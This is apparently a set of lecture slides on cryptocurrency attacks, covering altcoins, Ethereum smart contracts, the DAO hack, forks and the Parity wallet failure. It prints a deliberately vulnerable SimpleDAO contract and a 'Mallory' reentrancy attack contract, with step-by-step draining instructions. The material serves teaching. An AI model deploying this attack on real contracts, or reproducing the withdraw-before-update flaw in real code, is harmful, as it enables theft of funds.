More Cryptocurrency Attacks http://blockchain.unica.it/projects/ethereum-survey/index.html http://hackingdistributed.com/2016/06/18/analysis-of-the-dao- exploit/ https://hackernoon.com/what-caused-the-latest-100-million- ethereum-bug-and-a-detection-tool-for-similar- bugs-7b80f8ab7279 Last Class • Majority attacks • Block withholding attacks • Spam attacks • Sybil attacks • Blacklisting • Fungibility • Money laundering Last Class • With the rise of 51% attacks: • why? to what end? • when will this stop? • What are the points of centralization in this network? • Is this inevitable? Cryptocurrencies • First altcoin: Bitcoin testnet • Second altcoin: Namecoin (DNS system) • … • over two thousand altcoins/tokens/etc. But… why? • Improvements to Bitcoin • Alternatives to Bitcoin • Other functionality complementary to Bitcoin • Make money for founders But… how? • Altcoins: have their own blockchain • Tokens: built on top of cryptocurrencies Alternative Proof of Work Mechanisms • Litecoin: scrypt • Cuckoo Cycle • etc. Alternative functionality • NameCoin: DNS system • Ethereum: Turing complete • ZCash/Monero/others: “Private” Namecoin • “completes” Zooko’s Triangle • Blockchain-based DNS • First fork of Bitcoin • Merge mined with Bitcoin: • same hash function Ethereum • Currently the second most popular cryptocurrency • First proposed as a system built on top of Bitcoin • Started to create turing-complete money contracts “smart contracts” • Ether: currency which is input/output to contracts • Gas: execution cost of instructions Smart Contracts • Run on blockchain and executed by all nodes • Created by posting a transaction • Identified by address • Can hold, receive, and send money • Once deployed, cannot be changed Ethereum uses • DApps • Distributed applications • CryptoKitties! • Ponzi schemes! • Tokens • https://coinmarketcap.com/tokens/views/all/ The DAO • Crowdfunding platform • Envisioned as a leaderless organization • Anybody could hold DAO tokens • DAO creators together agreed on rules • Raised 12.7M Ether ($150M) Simplified DAO • Solidity: • high-level programming language to write smart contracts with • python-ish • Enter contract: donate • Exit contract: withdraw • Fallback option: Simplified DAO contract SimpleDAO { mapping (address => uint) public credit; function donate(address to){ credit[to] += msg.value; } function queryCredit(address to) returns (uint){ return credit[to]; } function withdraw(uint amount) { if (credit[msg.sender]>= amount) { msg.sender.call.value(amount)(); credit[msg.sender]-=amount; }}} Attack contract Mallory { SimpleDAO public dao = SimpleDAO(0x354...); address owner; function Mallory(){owner = msg.sender; } function() { dao.withdraw(dao.queryCredit(this)); } function getJackpot(){ owner.send(this.balance); } Attack contract SimpleDAO { mapping (address => uint) public credit; function donate(address to){ credit[to] += msg.value; } function queryCredit(address to) returns (uint){ return credit[to]; } Step 1: Attacker donates ether for Mallory. Attack contract Mallory { SimpleDAO public dao = SimpleDAO(0x354...); address owner; function Mallory(){owner = msg.sender; } function() { dao.withdraw(dao.queryCredit(this)); } function getJackpot(){ owner.send(this.balance); } Step 1: Attacker donates ether for Mallory. This triggers Mallory’s fallback. Attack function withdraw(uint amount) { if (credit[msg.sender]>= amount) { msg.sender.call.value(amount)(); credit[msg.sender]-=amount; } Step 2: Mallory’s fallback calls the withdraw function. Attack function withdraw(uint amount) { if (credit[msg.sender]>= amount) { msg.sender.call.value(amount)(); credit[msg.sender]-=amount; } Step 3: The withdraw function then invokes Mallory’s default again via call. Attack contract Mallory { SimpleDAO public dao = SimpleDAO(0x354...); address owner; function Mallory(){owner = msg.sender; } function() { dao.withdraw(dao.queryCredit(this)); } function getJackpot(){ owner.send(this.balance); } Step 4: We then attempt to withdraw again. The last call to withdraw was interrupted before it could update the credit field, so we still have ether to withdraw! Attack • We can repeat ad nauseam until: • contract gas is exhausted OR • balance of DAO is zero. But wait! 7 days before drain started But wait! 5 days before drain started But wait! • Code was attacked after it was patched. • But how can that be? • Remember: once deployed, cannot change Ethereum Price Shock Forks • Fork: update in software • Hard Fork • requires software update; old version incompatible • Soft Fork • old version compatible with new software Forks 29 What to do next with Ethereum? • Nothing • Gas limit • Ban spam addresses • Soft Fork • Hard Fork What happened next https://www.ofnumbers.com/2016/07/28/ethereum-core-and- ethereum-classic-for-dummies/ Parity Multisig • Ethereum Wallet • One person “killing” a wallet killed every wallet that relied on the contract Questions • If we can’t secure code in a normal case, how will we be able to secure it on a blockchain? • Do new blockchains create decentralization or centralization pressures? how?.